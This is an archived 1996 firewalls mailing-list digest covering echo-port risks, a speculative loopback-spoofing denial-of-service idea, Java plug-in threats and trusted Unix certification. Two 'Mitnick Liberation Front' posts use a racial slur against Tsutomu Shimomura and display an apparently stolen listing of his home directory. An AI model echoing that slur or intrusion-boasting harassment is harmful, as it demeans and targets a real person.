Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id LAA05280; Sat, 10 Feb 1996 11:10:11 -0500 (EST)
Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id LAA06159; Sat, 10 Feb 1996 11:10:10 -0500 (EST)
Date: Sat, 10 Feb 1996 11:10:09 -0500 (EST)
From: "Paul D. Robertson"
To: "Joe Smith (Really!)"
cc: firewalls@GreatCircle.COM
Subject: Re: anybody know of any vulnerabilities with "echo"
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 10 Feb 1996, Joe Smith (Really!) wrote:

> What is the loss of disabling echo? Or discard for that matter.

Some ping-like apps won't function. Discard will probably use just about as much overhead as the stack dropping a packet that isn't addressed to a listening port.

As an aside, has anyone tried the source endpoint as loopback's port 7? I don't have a decent machine that I can kill right now, but I'd think that it might be interesting. It doesn't do the network damage that picking two machines on the same subnet does, but could be a strong DOS against a single machine. (I've always taken the built-in services out of inetd.conf on *all* my public, and most of my private hosts, though echo has been a useful replacement for ping in the past between subnets where I pass TCP but not ICMP or UDP).
Just in case anyone is still paying attention, make sure that you've screened the loopback address on your outside screening routers along with your local subnets that protect against spoofing.

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Sat Feb 10 08:39:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18614 for firewalls-outgoing; Sat, 10 Feb 1996 08:30:46 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA18595 for ; Sat, 10 Feb 1996 08:30:40 -0800 (PST)
Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id LAA07650; Sat, 10 Feb 1996 11:29:55 -0500 (EST)
Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id LAA09373; Sat, 10 Feb 1996 11:29:54 -0500 (EST)
Date: Sat, 10 Feb 1996 11:29:54 -0500 (EST)
From: "Paul D. Robertson"
To: Jeff Murphy
cc: mdr@vodka.sse.att.com, Firewalls@GreatCircle.COM
Subject: Re: JAVA security problem ?
In-Reply-To: <199602091826.NAA15491@smurfland.cit.buffalo.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 9 Feb 1996, Jeff Murphy wrote:

> in netscape, you open a URL .. http://www.foo.com/applet.html
>
> and it downloads an applet.. the applet attempts to open a socket
> to 'firewall.your.com' and it fails... because the socket class that
> is available via netscape only permits it to connect to the host
> designated in the above URL. if you can use IP spoofing to change the
> URL listing in the "Location:" box of a browser.. i'd be fairly impressed.
>

It's not in the box on the screen that it gets this though, it's in storage, and with Netscape 2.0 you can run plug-in modules. PCs running Win*, and Macintoshes running System* don't have application level protected memory, right? So, all I need is a plug-in that sits around and waits for the Java code to start executing and overloads one of the standard callback functions with evil code, no?

It's been forever since I did any Win* development, but unless things have changed quite significantly, all it would take is "click here to get the nifty plug in", "Install the nifty plug-in", "Go to the gee-wizz-neat-o java site from the nifty plug-in".

I'd think that mime apps are the same sort of risk, and it really doesn't take Java to do this, but it sure is nice to be able to modify the attack code without getting the user to download new code each time, and run an installation.

I'd *really* like to see a version of Netscape, and a few other popular desktop TCP/IP apps, that wouldn't run code (including itself) that wasn't signed by a site administrator with a digital signature/checksum. Hell, I'd pay extra for that! If another vendor offered a trade-in on registered Netscape browsers, and had this functionality, they'd get my business exclusively (hint, hint -- it's worth a try).

> after thinking about it a bit more than i really wanted to.. i dont see how
> an applet can get around only being able to connect to www.foo.com.
>

After thinking about it for a lot longer than I really wanted to, I think that other than doing some CNAME or other DNS aliasing that someone else has already explored (wonder what the code actually checks for? Was this in the alpha release? I may still have that code somewhere...) there's much more harm to be done with plug-ins, mime types, rogue DLLs, message handlers, and callbacks. That doesn't mean that I'm thrilled with Java opening sockets though.

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Sat Feb 10 10:09:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22901 for firewalls-outgoing; Sat, 10 Feb 1996 10:02:50 -0800 (PST)
Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA22863 for ; Sat, 10 Feb 1996 10:02:38 -0800 (PST)
From: firewalls@count04.mry.scruznet.com
Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id JAA03551; Sat, 10 Feb 1996 09:55:16 -0800 (PST)
Message-Id: <199602101755.JAA03551@count04.mry.scruznet.com>
To: Sick Puppy
cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com
Subject: Re: Hoo Dat?
In-reply-to: Your message of "Thu, 08 Feb 1996 14:17:36 EST."
Date: Sat, 10 Feb 1996 09:55:15 -0800
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

on the so-called intruders... it looks like a noc scan from tkined or certain badly written clients I have observed. it is supposedly coming from your nic .... got the raw data??
cheers
kelly

From firewalls-owner Sat Feb 10 11:09:36 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25068 for firewalls-outgoing; Sat, 10 Feb 1996 11:03:52 -0800 (PST)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA25063 for ; Sat, 10 Feb 1996 11:03:48 -0800 (PST)
Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQaciu18635; Sat, 10 Feb 1996 14:03:04 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA09641; Sat, 10 Feb 96 13:52:24 EST
Date: Sat, 10 Feb 1996 13:52:24 -0500 (EST)
From: Sick Puppy
To: firewalls@count04.mry.scruznet.com
Cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com
Subject: Re: Hoo Dat?
In-Reply-To: <199602101755.JAA03551@count04.mry.scruznet.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Got pretty long logs like the ones I posted, of three d00ds having a go one after the other. The sniffers I have buried in networks capture gigabytes of data every week so I only pull out key fields. If those logs were from a firewall, they would read something like:

    Date/time  UDP from xxx.xxx.xxx.xxx on unserved port nnn
    Date/time  TCP from xxx.xxx.xxx.xxx on unserved port mmm

Unless someone especially wants to see the logs posted on the list, will e-mail them to you.
Sick Puppy, the Cat_Eating_Dawg

From firewalls-owner Sat Feb 10 11:39:59 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25737 for firewalls-outgoing; Sat, 10 Feb 1996 11:30:42 -0800 (PST)
Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA25732 for ; Sat, 10 Feb 1996 11:30:39 -0800 (PST)
Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id LAA04563 for ; Sat, 10 Feb 1996 11:30:34 -0800 (PST)
X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f
Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma004553; Sat Feb 10 11:30:25 1996
Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id LAA16574 for firewalls@greatcircle.com; Sat, 10 Feb 1996 11:31:03 -0800 (PST)
From: Brian Murrell
Message-Id: <199602101931.LAA16574@mocha.bctel.net>
Date: Sat, 10 Feb 1996 11:31:02 -0800 (PST)
To: firewalls@greatcircle.com
Subject: lotsa ICMP redirects lateley??
X-Mailer: Ishmail-demo 1.2-960125-sol24
MIME-Version: 1.0
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I've been seeing (and dropping) quite a few router redirects lately. These seem to be coming from about 4 or 5 different sites/routers. The part I don't get is why would a router legitimately send an icmp redirect to another router many hops away?? I can't see how an icmp redirect is useful to any router except the one that just sent the packet, and that being, why would a router send icmp redirects many hops away??

b.
--
Brian J. Murrell                    murrell@bctel.net
BCTel Advanced Communications       brian@ilinx.com
Vancouver, B.C.
                                    brian@wimsey.com
                                    604 454 5261

From firewalls-owner Sat Feb 10 12:24:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA27173 for firewalls-outgoing; Sat, 10 Feb 1996 12:20:04 -0800 (PST)
Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA27161 for ; Sat, 10 Feb 1996 12:20:00 -0800 (PST)
From: firewalls@count04.mry.scruznet.com
Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id MAA03720; Sat, 10 Feb 1996 12:12:41 -0800 (PST)
Message-Id: <199602102012.MAA03720@count04.mry.scruznet.com>
To: Sick Puppy
cc: firewalls@count04.mry.scruznet.com, firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com
Subject: Re: Hoo Dat?
In-reply-to: Your message of "Sat, 10 Feb 1996 13:52:24 EST."
Date: Sat, 10 Feb 1996 12:12:41 -0800
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Again, tkined and other free noc software is especially noisy if commanded to do certain functions. Considering the log tracks on the ip back to a nic, it's one possible cause. The real tail :) is told by the raw packet dump and doing forensics on that...

BTW when I was locking horns with an italian hacker who was attacking the IETF 95 San Jose IETF NOC I saw almost this identical signature. In that case the individual who showed up at the ietf claimed his machine was running VMS and Multinet and this was typical behaviour for its x-windows clients. Having a VMS hacker type in the noc we asked him to simulate this on his machine located in aus... the behaviour wasn't the same and the security policy at the cisco was changed to log and then drop the packets on the floor. As we had so many attendees and so much insecurity to deal with we simply elected to limit our risk (and cause some hard feelings...)
you may want to contact the POC in the whois sent you

cheers
kelly

From firewalls-owner Sat Feb 10 13:09:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA28921 for firewalls-outgoing; Sat, 10 Feb 1996 13:03:11 -0800 (PST)
Received: from westie.gi.net (westie.gi.net [198.247.250.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA28893 for ; Sat, 10 Feb 1996 13:03:01 -0800 (PST)
Received: (from alan@localhost) by westie.gi.net (8.7.1/8.7.1) id OAA25982; Sat, 10 Feb 1996 14:58:51 -0600 (CST)
From: Alan Hannan
Message-Id: <199602102058.OAA25982@westie.gi.net>
Subject: Re: Hoo Dat?
To: firewalls@count04.mry.scruznet.com
Date: Sat, 10 Feb 1996 14:58:51 -0600 (CST)
Cc: sikpuppy@Maestro.COM, firewalls@GreatCircle.COM
In-Reply-To: <199602102012.MAA03720@count04.mry.scruznet.com> from "firewalls@count04.mry.scruznet.com" at Feb 10, 96 12:12:41 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

] Again tkined and other free noc software is especially
] noisy if commanded to do certain functions.

Tools don't annoy people, people annoy people.
-alan From firewalls-owner Sat Feb 10 14:56:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03635 for firewalls-outgoing; Sat, 10 Feb 1996 14:52:00 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03629 for ; Sat, 10 Feb 1996 14:51:56 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id QAA30156; Sat, 10 Feb 1996 16:57:45 -0600 Date: Sat, 10 Feb 1996 16:57:45 -0600 (CST) From: "Joe Smith (Really!)" To: firewalls@greatcircle.com Subject: syslog Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for some good documentation on syslog and the syslog.conf file. From firewalls-owner Sat Feb 10 17:40:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA08768 for firewalls-outgoing; Sat, 10 Feb 1996 17:25:06 -0800 (PST) Received: from azazel.sdsc.edu (azazel.sdsc.edu [132.249.22.242]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA08763 for ; Sat, 10 Feb 1996 17:25:03 -0800 (PST) Received: (bhass@localhost) by azazel.sdsc.edu (8.7.1/8.6.10) id RAA24100 for firewalls@greatcircle.com; Sat, 10 Feb 1996 17:24:20 -0800 (PST) Date: Sat, 10 Feb 1996 17:24:20 -0800 (PST) From: Brosl Hasslacher Message-Id: <199602110124.RAA24100@azazel.sdsc.edu> To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings and Salutations from the Mitnick Liberation Front It seems that once again, that slanty-eyed chink Tsutomu has made another dollar at the expense of a hacker, Kevin Mitnick. In reality, Kevin Mitnick had no skills. But we do. Tsutomu's Kung-Foo is _still_ no good. Maybe we should read his book to be "skilled" in the art of Unix security? Nah. 
%dh%

From firewalls-owner Sat Feb 10 18:10:18 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA08885 for firewalls-outgoing; Sat, 10 Feb 1996 17:30:49 -0800 (PST)
Received: from azazel.sdsc.edu (azazel.sdsc.edu [132.249.22.242]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA08878 for ; Sat, 10 Feb 1996 17:30:46 -0800 (PST)
Received: (bhass@localhost) by azazel.sdsc.edu (8.7.1/8.6.10) id RAA24174 for firewalls@greatcircle.com; Sat, 10 Feb 1996 17:30:03 -0800 (PST)
Date: Sat, 10 Feb 1996 17:30:03 -0800 (PST)
From: Brosl Hasslacher
Message-Id: <199602110130.RAA24174@azazel.sdsc.edu>
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

total 1846
drwxr-xr-x   6 tsutomu      512 Jan  7 22:32 .
drwxr-xr-x  23 root         512 Feb  6 10:50 ..
-rw-r--r--   1 tsutomu      803 Feb 17  1994 .cshrc
drwx------   2 tsutomu      512 Feb 20  1994 .elm
-rw-r--r--   1 tsutomu    18920 Feb 17  1994 .emacs
-rw-r--r--   1 tsutomu     2934 Feb 18  1994 .login
-rw-r--r--   1 tsutomu       51 Feb 17  1994 .logout
-rw-r--r--   1 tsutomu    71406 Jul  2  1994 .newsrc
-r--------   1 tsutomu       37 Apr  4  1994 .rhosts
-rw-r--r--   1 tsutomu       42 Jul  2  1994 .rnlast
-rw-r--r--   1 tsutomu     7340 Jul  2  1994 .rnsoft
-rw-r--r--   1 tsutomu      143 Feb 17  1994 .signature
drwx------   2 tsutomu      512 Feb 20  1994 Mail
drwxr-xr-x   2 tsutomu      512 Jul  2  1994 News
drwx------  11 tsutomu     1536 Feb 21  1994 cops_104
-rw-r--r--   1 tsutomu    39660 Jan  7 22:32 f1.tgz
-rw-r--r--   1 tsutomu   233350 Mar 13  1994 gnus.tar.gz
-rw-r--r--   1 tsutomu  1383817 Mar  1  1994 ppp.tar.Z
-rwxr-xr-x   1 tsutomu    24576 May 14  1994 whichiufpu
-rwxr-xr-x   1 tsutomu    57344 Aug 23 22:17 xmodem
-rw-r--r--   1 tsutomu      290 Aug 23 22:22 xmodem.log
-rw-r--r--   1 tsutomu    13481 Aug 23 22:17 xmodem.man

From firewalls-owner Sat Feb 10 19:31:58 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA12780 for firewalls-outgoing; Sat, 10 Feb 1996 19:09:14 -0800 (PST)
Received: from alsys1.aecom.yu.edu (alsys1.aecom.yu.edu [129.98.1.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA12760 for ; Sat, 10 Feb 1996 19:09:07 -0800 (PST)
Received: from yu1.yu.edu by alsys1.aecom.yu.edu with SMTP id AA29432 (5.67b/IDA-1.5/AECOM-RIT for ); Sat, 10 Feb 1996 22:08:09 -0500
Received: by yu1.yu.edu (AIX 3.2/UCB 5.64/4.03) id AA88097; Sat, 10 Feb 1996 22:07:43 -0500
Date: Sat, 10 Feb 1996 22:07:42 -0500 (EST)
From: Mervyn Frankel
To: "Jason L. Haar"
Cc: brian@ilinx.bctel.net, brian_murrell@bctel.net, firewalls@GreatCircle.COM
Subject: 125 megabit infra-red
In-Reply-To:
Message-Id:
Organization: Yeshiva University
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Infra-red offers security that other technologies do not. Do you know of anyone that might be interested in this technology? Can anyone think of applications not mentioned in this blurb?

Merv

============================================================================
SUBJECT: HIGH-SPEED INFRA-RED NETWORK SYSTEM
DATE: January 25, 1996
----------------------------------------------------------------------------

The networking company claims it has leaped the networking industry with its latest release, an infra-red networking system that works at distances of up to 500 meters at data transmission speeds of 125 megabits-per-second (Mbps) under normal weather conditions, 230 meters under the worst conditions.

A spokesperson for the company told that traditional infra-red systems have worked at between one and sixteen Mbps, while for faster speeds, some networking companies have turned to laser systems.

"The problem with many laser "wireless" airlinks is that anyone who looks into the line of the laser light puts their eyesight at risk," he said. "If you put a laser airlink system on your roof and a guy who is cleaning windows happens to peek into the light source, the company opens itself up to a possible lawsuit.
With the new device, you avoid that problem, as well as opening up high-speed transparent networking over long distances."

The company claims that the system can operate at distances of several kilometers, but the specified maximum is 500 meters. "This allows the system to work in most weather conditions, including rain, snow, and light fog. At longer distances you tend to get fading under certain weather conditions, so we don't recommend beyond 500 meters for this reason."

A spokesman claims that the wireless infra-red airlink system is the networking industry's first LED (light emitting diode)-based wireless system to achieve ultra fast data rates, and so support ATM (asynchronous transfer mode), Fast Ethernet (100Mbps) and FDDI (Fiber Distributed Data Interface) bypass applications.

Leasing fiber optic links between buildings can take several months in some countries and situations. The system, meanwhile, can be installed quickly and efficiently, with a complete system, including two stations, costing from $10,000 to $15,000.

"If you just want a single network application, such as Token Ring or Ethernet, the price is the lower reaches of this band, while if you want a transparent link that can handle all network technologies, it's towards the higher end of this price band," was explained.
Merv Frankel
President
Speedy Computer Solutions
LAN/WAN Internetworking Specialists
144-16 68 Drive
Flushing, New York 11367-1735
718-261-7754
718-263-8107 fax

From firewalls-owner Sat Feb 10 19:39:22 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA12334 for firewalls-outgoing; Sat, 10 Feb 1996 18:55:59 -0800 (PST)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22872 for ; Fri, 9 Feb 1996 10:48:35 -0800 (PST)
Received: from tsgops.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA05744; Fri, 9 Feb 1996 13:47:36 -0500
Received: by tsgops.rtp.dg.com (5.4R3.10/200.8.1.3) id AA09066; Fri, 9 Feb 1996 13:47:29 -0500
From: spencerj@dg-rtp.dg.com (Jon Spencer)
Message-Id: <9602091847.AA09066@tsgops.rtp.dg.com>
Subject: Re: Most Secure Unix?
To: ianj-b@dial.pipex.com (Ian Johnstone-Bryden)
Date: Fri, 9 Feb 1996 13:47:29 -0500 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Ian Johnstone-Bryden" at Feb 8, 96 05:43:36 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[SNIP]

Ian writes in response to Rolf, who wrote in response to me, ...

> I would have been much happier if ITSEC Scheme Body Secretariats
> warranted the certificates which they issue. It is a point which I
> have regularly raised from the first working parties on the drafting
> and adoption of ITSEC. Unfortunately, the Scheme Body Secretariats
> are staffed by government employees who are reluctant to put their
> money where their mouth is.

As someone who is currently in E4 eval with a greater than F/B2 Unix product I have thought about this issue of "warranting" such a certification. What would the warranty provide protection from? What omissions are OK and which ones are not OK? This would be a barrister's dream!
I think that reasonable people can come to an understanding on these issues. However, there are some very complicated issues. For example, our claim of "virus prevention" has been accepted by the UK ITSEC folks as an evaluatable claim. Note that this is the first time at any level that they have accepted ANY virus-related claim. So we make some statements about what must be true for this to be effective. If a virus does indeed get into the system, there are (at least) four possibilities as to how it happened:

(1) Our virus prevention claim was made in error, but that error was not detected by the CLEF (or by NSA, since we are also in B2 eval).

(2) The site violated the conditions necessary to provide virus prevention.

(3) The claim was valid to the E4/B2 level of assurance, but no (current :-) system is perfect, and some flaw not detectable by the current analysis and proof methods exists in the product.

(4) We introduced an error in the product after certification.

So, how do you determine which of the above four reasons was the cause? And what do you do about it? What if a real loss of a ton o' money resulted? What do you do about it?

These are difficult questions to answer. One way is to pay a ton o' money for the product if you want the warranty, and the company and/or CLEF get insurance. Another way is to punt on the whole issue.

[SNIP]

> In terms of arguing which OS is the most secure, that's a false
> position. A certificate only states how well a product performed
> under test against one set of conditions. It provides a reasonably
> level playing field in that all B1 certified products met the same
> minimum standards, but it doesn't necessarily show that some B1
> products also do other things which make them more suitable for some
> risk management requirements.

And the truth of the matter is that the TCSEC is based on what was doable 15 years or more ago. It doesn't deal with several classes of threats, such as viruses and administrators.
(Administrators are responsible for 75% of all security violations - intentional and unintentional - yet they are considered a part of the TCB by the TCSEC and the ITSEC.) Our system addresses these issues, which appears as a claim in the ITSEC certificate, but not the TCSEC eval. So it is sometimes very difficult to rate systems.

And I agree that we have an issue regarding "most secure." As you indicate, it all depends upon your threat profile.

[SNIP]

>
> That's fine and there are many trusted OS around covering from C2
> upwards. If you insist on a definition of UNIX as 'based on AT&T
> source code etc.', it could be argued that no UNIX can exceed
> F-B2/E4. A purist may also argue that even that is not a true UNIX
> and F-B1/E3 is the limit.

Well, we, of course, are the exception to the rule. But we wrote our kernel from scratch to be high assurance. We are in at E4. And don't tell my CEO, but there is no reason that we or our CLEF can see which would prevent us from going E5 or E6. In fact, ... (he just walked in, so I'll stop talking about this now! :-)

>
> There is also the argument that the OS flavour and UNIX-like
> qualities are irrelevant in building special duty systems like
> firewalls which do not need to mount typical general purpose computer
> applications and do not need to host many direct users (depends what
> you are trying to achieve, but a trusted barrier system requires 3
> direct users normally and everyone else is an indirect user in
> transit). There is some merit in this argument and a typical firewall
> implementation may well include some devices which not only don't
> employ a trusted OS but don't use UNIX either.

Unix is an API. "Trust" is basically the quality of the underlying mechanisms. There is absolutely no reason why you can't put - say - an NT API in our OS and look like NT, and be certifiable. (Hmmmmmm - "certifiable" takes on a new meaning here! :-) I think that it is an error to confuse the two.
I think that for most people, "UNIX" means AT&T source base UNIX. In that case, I agree with the above assessment. In fact, I do not think that you can go above B1 with such a source base, without a complete rewrite, in which case it is no longer that source base.

>
> Many of the arguments by MS fanatics in favour of NT etc., hinge on a
> belief that Bill Gates couldn't possibly produce a product with
> defects. The main argument in favour of UNIX, other than some people
> already use it and are familiar with the calls and screens, is that a
> trusted system developer can obtain source code and carefully
> re-engineer the OS to remove the standard looney tune features that a
> common UNIX has.

A problem with this is commercial acceptance. The OS will not be successful unless it runs standard applications transparently. But that's another discussion!

>
> Trying to do that with something like NT is vastly more difficult not
> because the products present technology difficulties, but because of
> the way Microsoft trades and reluctantly makes partial source code
> available to outsiders after considerable difficulties.

You don't need source code to implement the NT API.

> [SNIP]
>
> There is already a very wide selection of B1/B1+ UNIX OS available,
> the majority of which depend on SecureWare technology to achieve the
> assurance. They achieve the same advantages as untrusted UNIX in
> terms of application portability and most are highly configurable.

And at least one B2/E4 system (well, really in B2 and E4 eval system), and that is Data General's commercial Unix system.

[SNIP]

>
> When someone claims to know everything about an OS, I really do begin
> to wonder. That rare animal may exist and be worth his weight in gold
> several times over.
> Even the owners of UNIX (or most other OS) find
> large areas of product which they really don't understand any more,
> and probably didn't understand that well at the time the code was
> cut, but they leave alone to save time and money. If a competent
> engineer went through a typical UNIX and stripped out those chunks of
> code which do nothing for him, the end product would look very small.

At B2 and E4, **ALL** code that is even referenced to administer the system is evaluated and must meet strict standards of architecture, design, documentation, implementation, and testing, as well as exactly match the user and administrative documentation. This is not the case at B1 and below or E3 and below. That is why B2 and E4 are the minimum levels at which the term "high assurance" can apply (IMHO), and why we did such a system. It's the only way we could honestly state that we truly believe that the system works as we say it works (with the warning that there are undiscovered flaws in the system, but no one has yet discovered them using a very rigorous process - yet they do exist).

>
> One of the things which a trusted UNIX developer has to do is to pull
> the starting product apart and understand what each piece does,
> remove the nasty bits, and add some code to develop the requirement
> functionality. He also has to document everything in a way which
> would make many developers faint.
>
> The primary reason for difficulty in taking UNIX above F-B1/E3 is
> that you are still left with some areas which can't be fully
> documented back to origination because of the way the product was
> originally developed and documented. It's not impossible and the
> re-engineering tool kit developed under the Armadillo One
> specification went a long way to addressing the issues, but it's still
> very expensive to do and requires a great deal of highly skilled
> labour at computer scientist rather than computer engineer level.
That is why we wrote it from scratch, with stringent software engineering methods.

[SNIP]

>
> Although there are several issues I don't agree with in the higher
> levels of TCSEC and ITSEC, international networking and electronic
> trading require a level of risk reduction which demands capabilities
> beyond F-B2/E4. The point can be argued, but a good B1+ product
> already addresses a number of key areas such as trusted path and
> trusted audit beyond B3. There is the question of whether customers
> are prepared to pay for that and many people probably enjoy playing
> roulette with their organisation's future.

I agree completely, EXCEPT that the ITSEC does not talk about functionality. The E4 level of assurance is the minimum necessary to accomplish what you want, I think. The feature set must be extended (as we have done) to accomplish the rest (so long as all of it is E4 or greater).

>
> It could be that the way forward will mean that UNIX, as it stands
> today, is inappropriate and that we should go back to basics, decide
> what the real benefits of UNIX are and then incorporate them in a new
> open OS environment. If we do that there is no reason why we can't
> build an OS which performs even beyond the levels described at A1,
> and we may need to do that.

Hmmmmmm - A1 assurance is not trivial. We need to develop some new formal tools, I think, before those levels can be reached.

In fact, just to make our B2 system commercial (i.e., meaning that it comes out at the same time as our standard unix system, and is in sync with the standard system) required that we invent new methodologies and formal methods to deal with issues such as least privilege and covert channels. (And anyone who thinks that covert channels don't affect the average system simply doesn't yet understand the manner in which covert channels can be exploited.)

[SNIP]

>
> In the meantime we have to live with what we have.
> Waiting for Bill
> Gates to deliver NT2121 with every possible functionality you could
> ever ask for (and a promise that all the bugs will be removed by
> NT3030), in an environment where Bill claims you can't even build a
> dishwasher without bundling NT with the washing powder, means that
> you either believe in immortality, or you are thinking of a better
> world for your great great great grandchildren and praying the world
> is still around then.

I think that a different and definitely achievable goal is that you have a B2/E4 system that runs shrink-wrapped NT apps unmodified, but provides REAL security and protection from the real threats faced by the organization, and is at least as easy to administer as NT is.

> Ian J-B.
>
>

Thanks for your comments, Ian.

================================
Jon F. Spencer                     spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj)
Data General Corp.                 Phone : (919)248-6246
62 T.W. Alexander Dr, MS #119      FAX   : (919)248-6108
Research Triangle Park, NC 27709   Office RTP 121/9
Reality is an illusion - perception is what counts.
No success can compensate for failure at home.  President David O. McKay
***** UCC 1-207 ********

From firewalls-owner Sat Feb 10 19:53:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA12233 for firewalls-outgoing; Sat, 10 Feb 1996 18:54:01 -0800 (PST)
Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA16643 for ; Sat, 10 Feb 1996 07:49:43 -0800 (PST)
Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id PAA26274; Sat, 10 Feb 1996 15:48:46 GMT
Message-ID:
In-Reply-To: <9602091847.AA09066@tsgops.rtp.dg.com>
References: Conversation with last message <9602091847.AA09066@tsgops.rtp.dg.com>
To: Firewall List
MIME-Version: 1.0
From: Ian Johnstone-Bryden
Subject: Re: Most Secure Unix?
Date: Sat, 10 Feb 96 15:54:54 GMT
Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

and Jon Spencer responded further

> [SNIP]
>
> Ian writes in response to Rolf, who wrote in response to me, ...
>
> > I would have been much happier if ITSEC Scheme Body Secretariats
> > warranted the certificates which they issue. It is a point which I
> > have regularly raised from the first working parties on the drafting
> > and adoption of ITSEC. Unfortunately, the Scheme Body Secretariats
> > are staffed by government employees who are reluctant to put their
> > money where their mouth is.
>
> As someone who is currently in E4 eval with a greater than F/B2 Unix product
> I have thought about this issue of "warranting" such a certification.
> What would the warranty provide protection from? What omissions are
> OK and which ones are not OK? This would be a barrister's dream!

